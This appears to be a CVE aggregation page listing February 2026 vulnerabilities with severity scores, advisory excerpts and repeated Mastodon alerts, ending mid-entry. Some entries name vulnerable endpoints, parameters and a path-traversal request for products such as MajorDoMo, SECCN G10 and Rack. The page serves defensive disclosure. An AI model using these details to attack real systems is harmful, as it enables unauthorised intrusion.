## Updated at UTC 2026-02-19T03:40:37.023009

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-27182 8.4 0.00% 2 0 2026-02-19T00:30:37 Saturn Remote Mouse Server contains a command injection vulnerability that allow
CVE-2026-27180 9.8 0.00% 4 0 2026-02-19T00:30:30 MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated remote co
CVE-2026-2686 9.8 0.00% 4 0 2026-02-19T00:16:22.143000 A security vulnerability has been detected in SECCN Dingcheng G10 3.1.0.181203.
CVE-2026-22860 7.5 0.00% 2 0 2026-02-18T23:49:03 ## Summary `Rack::Directory`’s path check used a string prefix match on the exp
CVE-2026-2650 8.8 0.00% 4 0 2026-02-18T23:16:20.720000 Heap buffer overflow in Media in Google Chrome prior to 145.0.7632.109 allowed a
CVE-2026-2649 8.8 0.00% 2 0 2026-02-18T23:16:20.557000 Integer overflow in V8 in Google Chrome prior to 145.0.7632.109 allowed a remote
CVE-2026-25548 9.1 0.00% 2 0 2026-02-18T23:16:19.567000 InvoicePlane is a self-hosted open source application for managing invoices, cli
CVE-2026-25903 None 0.01% 1 0 2026-02-18T22:39:27 Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configur
CVE-2026-27181 7.5 0.00% 2 0 2026-02-18T22:16:26.337000 MajorDoMo (aka Major Domestic Module) allows unauthenticated arbitrary module un
CVE-2026-27179 8.2 0.00% 2 0 2026-02-18T22:16:25.967000 MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection
CVE-2026-27175 9.8 0.00% 4 0 2026-02-18T22:16:25.263000 MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated OS comman
CVE-2026-27174 9.8 0.00% 4 0 2026-02-18T22:16:25.080000 MajorDoMo (aka Major Domestic Module) allows unauthenticated remote code executi
CVE-2026-1435 9.8 0.00% 4 0 2026-02-18T21:32:25 Not properly invalidated session vulnerability in Graylog Web Interface, version
CVE-2025-1272 7.8 0.00% 2 2 2026-02-18T21:31:34 The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above fo
CVE-2026-0875 7.8 0.00% 2 0 2026-02-18T21:31:34 A maliciously crafted MODEL file, when parsed through certain Autodesk products,
CVE-2025-70064 8.8 0.00% 2 0 2026-02-18T21:31:23 PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulne
CVE-2025-70147 7.5 0.00% 2 0 2026-02-18T21:31:23 Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWo
CVE-2025-65717 4.3 0.03% 6 0 2026-02-18T21:16:21.480000 An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to
CVE-2026-0874 7.8 0.00% 2 0 2026-02-18T20:18:32.193000 A maliciously crafted CATPART file, when parsed through certain Autodesk product
CVE-2025-14009 10.0 0.00% 4 0 2026-02-18T20:18:31.207000 A critical vulnerability exists in the NLTK downloader component of nltk/nltk, a
CVE-2026-22769 10.0 0.07% 26 0 2026-02-18T20:01:15.983000 Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a
CVE-2025-70149 9.8 0.00% 2 0 2026-02-18T19:21:43.090000 CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in pri
CVE-2025-70146 9.1 0.00% 2 0 2026-02-18T19:21:42.767000 Missing authentication in multiple administrative action scripts under /admin/ i
CVE-2021-22175 9.8 52.88% 4 0 template 2026-02-18T18:31:26 When requests to the internal network for webhooks are enabled, a server-side re
CVE-2026-24708 8.2 0.00% 2 0 2026-02-18T18:30:51 An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 3
CVE-2026-2507 7.5 0.00% 4 0 2026-02-18T18:30:51 When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM
CVE-2025-70148 7.5 0.00% 2 0 2026-02-18T18:30:47 Missing authentication and authorization in print_membership_card.php in CodeAst
CVE-2025-65791 9.8 0.00% 2 1 2026-02-18T18:30:39 ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. T
CVE-2025-70998 9.8 0.00% 4 0 2026-02-18T18:30:39 UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain
CVE-2026-27099 8.0 0.00% 6 0 2026-02-18T18:30:38 Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both
CVE-2025-61982 7.8 0.00% 2 0 2026-02-18T18:30:38 An arbitrary code execution vulnerability exists in the Code Stream directive fu
CVE-2025-70150 9.8 0.00% 2 0 2026-02-18T18:24:20.040000 CodeAstro Membership Management System 1.0 contains a missing authentication vul
CVE-2025-70866 8.8 0.03% 2 0 2026-02-18T17:52:44.520000 LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated
CVE-2025-70954 7.5 0.02% 2 0 2026-02-18T17:52:44.520000 A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM)
CVE-2025-70828 8.8 0.05% 2 1 2026-02-18T17:52:22.253000 An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via th
CVE-2025-15578 9.8 0.04% 2 0 2026-02-18T17:52:22.253000 Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurel
CVE-2026-1334 7.8 0.01% 2 0 2026-02-18T17:52:22.253000 An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in
CVE-2026-1046 7.6 0.03% 3 0 2026-02-18T17:52:22.253000 Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links
CVE-2026-1750 8.8 0.03% 1 0 2026-02-18T17:52:22.253000 The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerab
CVE-2025-32061 8.8 0.02% 1 0 2026-02-18T17:52:22.253000 The specific flaw exists within the Bluetooth stack developed by Alps Alpine of
CVE-2026-2329 0 0.00% 6 0 2026-02-18T17:51:53.510000 An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP
CVE-2026-1670 9.8 0.04% 10 0 2026-02-18T17:51:53.510000 The affected products are vulnerable to an unauthenticated API endpoint exposure
CVE-2026-26119 8.8 0.08% 6 0 2026-02-18T17:51:53.510000 Improper authentication in Windows Admin Center allows an authorized attacker to
CVE-2025-33241 7.8 0.00% 2 0 2026-02-18T17:51:53.510000 NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem
CVE-2025-33240 7.8 0.00% 2 0 2026-02-18T17:51:53.510000 NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, wh
CVE-2025-33251 7.8 0.00% 2 0 2026-02-18T17:51:53.510000 NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem
CVE-2025-33245 8.0 0.00% 2 0 2026-02-18T17:51:53.510000 NVIDIA NeMo Framework contains a vulnerability where malicious data could cause
CVE-2025-60035 7.8 0.00% 2 0 2026-02-18T17:51:53.510000 A vulnerability has been identified in the OPC.Testclient utility, which is incl
CVE-2025-33253 7.8 0.00% 2 0 2026-02-18T17:51:53.510000 NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem
CVE-2026-1937 9.8 0.04% 4 0 2026-02-18T17:51:53.510000 The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to
CVE-2026-22048 7.1 0.04% 2 0 2026-02-18T17:51:53.510000 StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0
CVE-2026-23599 7.8 0.01% 4 0 2026-02-18T17:51:53.510000 A local privilege-escalation vulnerability has been discovered in the HPE Aruba
CVE-2025-13691 8.1 0.03% 2 0 2026-02-18T17:51:53.510000 IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive inform
CVE-2026-23595 8.8 0.09% 2 0 2026-02-18T17:51:53.510000 An authentication bypass in the application API allows an unauthorized administr
CVE-2026-2630 8.8 0.29% 4 0 2026-02-18T17:51:53.510000 A Command Injection vulnerability exists where an authenticated, remote attacker
CVE-2026-1368 7.5 0.01% 2 0 2026-02-18T15:32:29 The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX
CVE-2026-1426 8.8 0.00% 4 0 2026-02-18T15:31:35 The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Obje
CVE-2025-33250 7.8 0.00% 2 0 2026-02-18T15:31:34 NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem
CVE-2025-60037 7.8 0.00% 2 0 2026-02-18T15:31:34 A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an a
CVE-2025-33239 7.8 0.00% 2 0 2026-02-18T15:31:33 NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, wher
CVE-2025-33236 7.8 0.00% 2 0 2026-02-18T15:31:33 NVIDIA NeMo Framework contains a vulnerability where malicious data created by a
CVE-2025-33249 7.8 0.00% 2 0 2026-02-18T15:31:33 NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-prep
CVE-2025-33246 7.8 0.00% 2 0 2026-02-18T15:31:33 NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Eval
CVE-2025-33243 7.8 0.00% 2 0 2026-02-18T15:31:33 NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem
CVE-2025-60038 7.8 0.00% 2 0 2026-02-18T15:31:33 A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an a
CVE-2025-60036 7.8 0.00% 2 0 2026-02-18T15:31:33 A vulnerability has been identified in the UA.Testclient utility, which is inclu
CVE-2025-33252 7.8 0.00% 2 0 2026-02-18T15:31:33 NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem
CVE-2025-65715 7.8 0.02% 4 0 2026-02-18T15:31:25 An issue in the code-runner.executorMap setting of Visual Studio Code Extensions
CVE-2024-7694 7.2 1.86% 6 0 2026-02-18T13:46:48.840000 ThreatSonar Anti-Ransomware from TeamT5 does not properly validate the content o
CVE-2026-2441 8.8 0.63% 25 3 2026-02-18T13:46:40.307000 Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a
CVE-2026-2495 7.5 0.08% 4 0 2026-02-18T09:32:07 The WPNakama – Team and multi-Client Collaboration, Editorial and Project Manage
CVE-2026-1714 8.6 0.06% 2 0 2026-02-18T06:30:25 The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All
CVE-2026-2576 7.5 0.07% 2 0 2026-02-18T06:30:25 The Business Directory Plugin – Easy Listing Directories for WordPress plugin fo
CVE-2025-13689 8.8 0.03% 2 0 2026-02-18T00:30:22 IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute
CVE-2026-2627 7.8 0.01% 2 0 2026-02-18T00:30:22 A security flaw has been discovered in Softland FBackup up to 9.9. This impacts
CVE-2026-23647 9.8 0.26% 4 0 2026-02-17T21:32:21 Glory RBG-100 recycler systems using the ISPK-08 software component contain hard
CVE-2026-22208 9.7 0.17% 4 0 2026-02-17T21:32:21 OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 con
CVE-2025-67905 8.7 0.01% 2 0 2026-02-17T21:32:21 Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an ins
CVE-2026-23648 7.8 0.01% 2 0 2026-02-17T21:32:21 Glory RBG-100 recycler systems using the ISPK-08 software component contain mult
CVE-2026-0929 7.5 0.03% 2 0 2026-02-17T21:32:21 The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capa
CVE-2026-0829 5.8 0.02% 1 0 2026-02-17T21:32:21 The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenti
CVE-2020-7796 9.8 93.55% 6 0 template 2026-02-17T21:32:16 Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zi
CVE-2008-0015 8.8 80.64% 6 0 2026-02-17T21:32:16 Stack-based buffer overflow in the CComVariant::ReadFromStream function in the A
CVE-2026-1358 9.8 0.15% 1 0 2026-02-17T19:21:56.343000 Airleader Master versions 6.381 and prior allow for file uploads without restri
CVE-2025-70956 7.5 0.06% 2 0 2026-02-17T18:34:01 A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM)
CVE-2025-65753 9.1 0.04% 2 1 2026-02-17T18:33:00 An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 a
CVE-2025-70397 8.8 0.03% 2 0 2026-02-17T18:33:00 jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/
CVE-2025-70830 10.0 0.02% 2 1 2026-02-17T18:33:00 A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template
CVE-2025-65716 8.8 0.05% 4 0 2026-02-17T15:32:42 An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allo
CVE-2026-2439 9.8 0.05% 6 0 2026-02-17T15:32:42 Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure
CVE-2025-69633 9.8 0.08% 2 0 2026-02-17T15:32:42 A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreato
CVE-2026-2474 7.5 0.04% 4 0 2026-02-17T15:32:42 Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap b
CVE-2026-2447 8.8 0.04% 6 0 2026-02-17T15:32:41 Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Fi
CVE-2026-2616 8.8 0.02% 2 0 2026-02-17T15:31:36 A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted ele
CVE-2026-1731 9.8 49.74% 1 4 template 2026-02-17T13:40:10.320000 BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote
CVE-2026-2247 None 0.10% 2 0 2026-02-17T12:31:18 SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generat
CVE-2025-7631 8.6 0.03% 1 0 2026-02-17T12:31:13 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2026-2592 7.7 0.07% 2 1 2026-02-17T06:31:26 The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Impro
CVE-2026-26220 None 0.55% 1 0 2026-02-17T03:30:16 LightLLM version 1.1.0 and prior contain an unauthenticated remote code executio
CVE-2025-12062 8.8 0.06% 1 0 2026-02-17T00:30:19 The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory &
CVE-2026-2564 8.1 0.04% 1 1 2026-02-16T18:31:31 A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T
CVE-2026-1333 7.8 0.01% 1 0 2026-02-16T15:32:54 A Use of Uninitialized Variable vulnerability affecting the EPRT file reading pr
CVE-2026-2451 None 0.05% 1 0 2026-02-16T12:32:02 Emails sent by pretix can utilize placeholders that will be filled with customer
CVE-2026-2452 None 0.05% 1 0 2026-02-16T12:32:01 Emails sent by pretix can utilize placeholders that will be filled with customer
CVE-2026-2577 10.0 0.06% 1 0 2026-02-16T12:32:00 The WhatsApp bridge component in Nanobot binds the WebSocket server to all netwo
CVE-2026-26369 9.8 0.01% 3 0 2026-02-15T18:30:25 eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerabi
CVE-2026-26366 9.8 0.03% 2 0 2026-02-15T18:30:24 eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user
CVE-2025-32062 8.8 0.02% 3 0 2026-02-15T12:30:34 The specific flaw exists within the Bluetooth stack developed by Alps Alpine of
CVE-2025-32058 9.4 0.01% 2 0 2026-02-15T12:30:34 The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communica
CVE-2025-32059 8.8 0.02% 1 0 2026-02-15T12:30:25 The specific flaw exists within the Bluetooth stack developed by Alps Alpine of
CVE-2026-1490 9.8 0.04% 3 1 2026-02-15T06:31:38 The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vu
CVE-2024-43468 9.8 84.80% 1 3 2026-02-13T14:04:05.243000 Microsoft Configuration Manager Remote Code Execution Vulnerability
CVE-2026-2360 8.1 0.05% 2 0 2026-02-11T18:31:37 PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superu
CVE-2026-24061 9.8 76.94% 1 61 template 2026-02-11T15:40:42.937000 telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "
CVE-2026-21510 8.8 2.72% 1 1 2026-02-10T21:31:29 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-21513 8.8 4.12% 1 0 2026-02-10T21:31:29 Protection mechanism failure in MSHTML Framework allows an unauthorized attacker
CVE-2025-14831 5.3 0.04% 1 0 2026-02-09T16:08:35.290000 A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS)
CVE-2026-22903 9.8 0.57% 1 0 2026-02-09T09:30:28 An unauthenticated remote attacker can send a crafted HTTP request containing an
CVE-2026-24423 9.8 22.65% 1 1 2026-02-06T16:45:15.323000 SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated
CVE-2026-1340 9.8 29.29% 4 1 2026-02-04T16:34:21.763000 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2021-39935 6.8 57.16% 2 0 2026-02-04T15:56:15.730000 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2025-15467 9.8 0.92% 2 4 2026-02-02T18:38:55.073000 Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE
CVE-2026-1281 9.8 39.20% 7 1 2026-01-30T00:31:29 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2026-23760 9.8 55.75% 1 2 template 2026-01-27T18:33:14 SmarterTools SmarterMail versions prior to build 9511 contain an authentication
CVE-2025-64155 9.8 0.04% 2 4 2026-01-20T16:16:06.200000 An improper neutralization of special elements used in an os command ('os comman
CVE-2026-20965 7.6 0.03% 2 0 2026-01-13T18:31:18 Improper verification of cryptographic signature in Windows Admin Center allows
CVE-2025-59922 7.2 0.05% 2 0 2026-01-13T18:31:14 An improper neutralization of special elements used in an SQL command ('SQL Inje
CVE-2025-6264 4.7 0.07% 1 1 2025-10-13T15:45:56 Velociraptor allows collection of VQL queries packaged into Artifacts from endpo
CVE-2021-22214 None 93.52% 2 4 template 2023-01-29T05:06:54 When requests to the internal network for webhooks are enabled, a server-side re
CVE-2025-41725 0 0.00% 2 0 N/A
CVE-2026-2239 0 0.00% 1 0 N/A
CVE-2026-02447 0 0.00% 1 0 N/A

CVE-2026-27182
(8.4 HIGH)

EPSS: 0.00%

updated 2026-02-19T00:30:37

2 posts

Saturn Remote Mouse Server contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending specially crafted UDP JSON frames to port 27000. Attackers on the local network can send malformed packets with unsanitized command data that the service forwards directly to OS execution functions, enabling remote code execution under the service acc

thehackerwire@mastodon.social at 2026-02-18T22:19:23.000Z ##

🟠 CVE-2026-27182 - High (8.4)

Saturn Remote Mouse Server contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending specially crafted UDP JSON frames to port 27000. Attackers on the local network can send malformed...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T22:19:23.000Z ##

🟠 CVE-2026-27182 - High (8.4)

Saturn Remote Mouse Server contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending specially crafted UDP JSON frames to port 27000. Attackers on the local network can send malformed...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27180
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-19T00:30:30

4 posts

MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated remote code execution through supply chain compromise via update URL poisoning. The saverestore module exposes its admin() method through the /objects/?module=saverestore endpoint without authentication because it uses gr('mode') (which reads directly from $_REQUEST) instead of the framework's $this->mode. An attacker can poiso

thehackerwire@mastodon.social at 2026-02-18T22:18:15.000Z ##

🔴 CVE-2026-27180 - Critical (9.8)

MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated remote code execution through supply chain compromise via update URL poisoning. The saverestore module exposes its admin() method through the /objects/?module=saverestore endpo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq at 2026-02-18T21:30:13.389Z ##

🚨 CRITICAL: CVE-2026-27180 in sergejey MajorDoMo allows unauthenticated RCE via poisoned update URLs. Attackers can deploy arbitrary PHP files to webroot with 2 GETs. Patch urgently! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T22:18:15.000Z ##

🔴 CVE-2026-27180 - Critical (9.8)

MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated remote code execution through supply chain compromise via update URL poisoning. The saverestore module exposes its admin() method through the /objects/?module=saverestore endpo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T21:30:13.000Z ##

🚨 CRITICAL: CVE-2026-27180 in sergejey MajorDoMo allows unauthenticated RCE via poisoned update URLs. Attackers can deploy arbitrary PHP files to webroot with 2 GETs. Patch urgently! radar.offseq.com/threat/cve-20 #OffSeq #CVE #infosec #remotecodeexecution

##

CVE-2026-2686
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-19T00:16:22.143000

4 posts

A security vulnerability has been detected in SECCN Dingcheng G10 3.1.0.181203. This impacts the function qq of the file /cgi-bin/session_login.cgi. The manipulation of the argument User leads to os command injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used.

offseq at 2026-02-19T01:30:31.609Z ##

🚨 CRITICAL: CVE-2026-2686 in SECCN Dingcheng G10 (v3.1.0.181203) enables unauthenticated remote OS command injection via the 'User' param in /cgi-bin/session_login.cgi. Exploit code is public. Restrict access & monitor! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-19T00:19:26.000Z ##

🔴 CVE-2026-2686 - Critical (9.8)

A security vulnerability has been detected in SECCN Dingcheng G10 3.1.0.181203. This impacts the function qq of the file /cgi-bin/session_login.cgi. The manipulation of the argument User leads to os command injection. The attack is possible to be ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-19T01:30:31.000Z ##

🚨 CRITICAL: CVE-2026-2686 in SECCN Dingcheng G10 (v3.1.0.181203) enables unauthenticated remote OS command injection via the 'User' param in /cgi-bin/session_login.cgi. Exploit code is public. Restrict access & monitor! radar.offseq.com/threat/cve-20 #OffSeq #CVE20262686 #IoTSec

##

thehackerwire@mastodon.social at 2026-02-19T00:19:26.000Z ##

🔴 CVE-2026-2686 - Critical (9.8)

A security vulnerability has been detected in SECCN Dingcheng G10 3.1.0.181203. This impacts the function qq of the file /cgi-bin/session_login.cgi. The manipulation of the argument User leads to os command injection. The attack is possible to be ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22860
(7.5 HIGH)

EPSS: 0.00%

updated 2026-02-18T23:49:03

2 posts

## Summary `Rack::Directory`’s path check used a string prefix match on the expanded path. A request like `/../root_example/` can escape the configured root if the target path starts with the root string, allowing directory listing outside the intended root. ## Details In `directory.rb`, `File.expand_path(File.join(root, path_info)).start_with?(root)` does not enforce a path boundary. If the se

thehackerwire@mastodon.social at 2026-02-18T19:25:15.000Z ##

🟠 CVE-2026-22860 - High (7.5)

Rack is a modular Ruby web server interface. Prior to versions 2.2.22, 3.1.20, and 3.2.5, `Rack::Directory`’s path check used a string prefix match on the expanded path. A request like `/../root_example/` can escape the configured root if the ta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:25:15.000Z ##

🟠 CVE-2026-22860 - High (7.5)

Rack is a modular Ruby web server interface. Prior to versions 2.2.22, 3.1.20, and 3.2.5, `Rack::Directory`’s path check used a string prefix match on the expanded path. A request like `/../root_example/` can escape the configured root if the ta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2650
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T23:16:20.720000

4 posts

Heap buffer overflow in Media in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

offseq at 2026-02-19T03:00:31.105Z ##

⚠️ CVE-2026-2650: HIGH severity heap buffer overflow in Google Chrome before 145.0.7632.109. Remote attackers can exploit via malicious HTML for code execution. Patch ASAP! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T23:26:51.000Z ##

🟠 CVE-2026-2650 - High (8.8)

Heap buffer overflow in Media in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-19T03:00:31.000Z ##

⚠️ CVE-2026-2650: HIGH severity heap buffer overflow in Google Chrome before 145.0.7632.109. Remote attackers can exploit via malicious HTML for code execution. Patch ASAP! radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vuln #CVE20262650

##

thehackerwire@mastodon.social at 2026-02-18T23:26:51.000Z ##

🟠 CVE-2026-2650 - High (8.8)

Heap buffer overflow in Media in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2649
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T23:16:20.557000

2 posts

Integer overflow in V8 in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

thehackerwire@mastodon.social at 2026-02-18T23:26:41.000Z ##

🟠 CVE-2026-2649 - High (8.8)

Integer overflow in V8 in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T23:26:41.000Z ##

🟠 CVE-2026-2649 - High (8.8)

Integer overflow in V8 in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25548
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T23:16:19.567000

2 posts

InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A critical Remote Code Execution (RCE) vulnerability exists in InvoicePlane 1.7.0 through a chained Local File Inclusion (LFI) and Log Poisoning attack. An authenticated administrator can execute arbitrary system commands on the server by manipulating the `public_invoice_template` setting to include

thehackerwire@mastodon.social at 2026-02-18T23:26:31.000Z ##

🔴 CVE-2026-25548 - Critical (9.1)

InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A critical Remote Code Execution (RCE) vulnerability exists in InvoicePlane 1.7.0 through a chained Local File Inclusion (LFI) and Log Poisoning at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T23:26:31.000Z ##

🔴 CVE-2026-25548 - Critical (9.1)

InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A critical Remote Code Execution (RCE) vulnerability exists in InvoicePlane 1.7.0 through a chained Local File Inclusion (LFI) and Log Poisoning at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25903(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-02-18T22:39:27

1 posts

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a co

offseq@infosec.exchange at 2026-02-17T11:30:45.000Z ##

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20 #OffSeq #NiFi #infosec #CVE202625903

##

CVE-2026-27181
(7.5 HIGH)

EPSS: 0.00%

updated 2026-02-18T22:16:26.337000

2 posts

MajorDoMo (aka Major Domestic Module) allows unauthenticated arbitrary module uninstallation through the market module. The market module's admin() method reads gr('mode') from $_REQUEST and assigns it to $this->mode at the start of execution, making all mode-gated code paths reachable without authentication via the /objects/?module=market endpoint. The uninstall mode handler calls uninstallPlugin

thehackerwire@mastodon.social at 2026-02-18T22:18:25.000Z ##

🟠 CVE-2026-27181 - High (7.5)

MajorDoMo (aka Major Domestic Module) allows unauthenticated arbitrary module uninstallation through the market module. The market module's admin() method reads gr('mode') from $_REQUEST and assigns it to $this->mode at the start of execution, mak...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T22:18:25.000Z ##

🟠 CVE-2026-27181 - High (7.5)

MajorDoMo (aka Major Domestic Module) allows unauthenticated arbitrary module uninstallation through the market module. The market module's admin() method reads gr('mode') from $_REQUEST and assigns it to $this->mode at the start of execution, mak...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27179
(8.2 HIGH)

EPSS: 0.00%

